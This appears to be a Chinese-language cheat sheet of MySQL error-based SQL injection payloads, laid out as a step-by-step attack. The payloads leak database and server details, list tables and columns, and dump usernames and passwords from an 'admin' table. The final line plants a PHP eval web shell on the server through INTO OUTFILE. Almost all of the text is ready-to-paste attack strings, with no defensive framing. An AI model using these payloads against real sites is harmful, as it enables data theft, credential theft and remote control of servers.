语句模型:

  1. and(select 1 from(select count(*),concat((select concat(注入语句) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and' 

爆出一些网站相关信息:

  1. and (select 1 from(select count(*),concat((select concat(0x3a,database(),0x3a,user(),0x3a,version(),0x3a,@@datadir) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a)>

爆数据信息,相关函数:
system_user() 系统用户名
user() 用户名
current_user 当前用户名
session_user() 连接数据库的用户名
database() 数据库名
version() MYSQL数据库版本
load_file() MYSQL读取本地文件的函数
@@datadir 读取数据库路径
@@basedir MYSQL 安装路径
@@version_compile_os 操作系统
information_schema.schemata 数据库名表
information_schema.tables 表名表
information_schema.columns 字段名
 
 'and(select 1 from(select count(*),concat((select concat(相关函数1,0x20,相关函数2,0x20,......) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'

2.爆表
'and(select 1 from(select count(*),concat((select concat(table_name) from information_schema.tables where table_schema=数据库的Hex limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'

'and(select 1 from(select count(*),concat((select concat(table_name) from information_schema.tables where table_schema=数据库的Hex limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'

'and(select 1 from(select count(*),concat((select concat(table_name) from information_schema.tables where table_schema=数据库的Hex limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'
.......

3.爆列
'and(select 1 from(select count(*),concat((select concat(column_name) from information_schema.columns where table_name=表名的Hex limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'

'and(select 1 from(select count(*),concat((select concat(column_name) from information_schema.columns where table_name=表名的Hex limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'

'and(select 1 from(select count(*),concat((select concat(column_name) from information_schema.columns where table_name=表名的Hex limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'
........

4.爆用户和密码
'and(select 1 from(select count(*),concat((select concat(username,0x20,password) from admin limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'

'and(select 1 from(select count(*),concat((select concat(username,0x20,password) from admin limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'

'and(select 1 from(select count(*),concat((select concat(username,0x20,password) from admin limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'
........

' or 1 AND (SELECT id FROM the_users limit 1 INTO OUTFILE 'D:/sub/jw/safe1.php' lines terminated by '<?php eval($_POST[safe])?>') #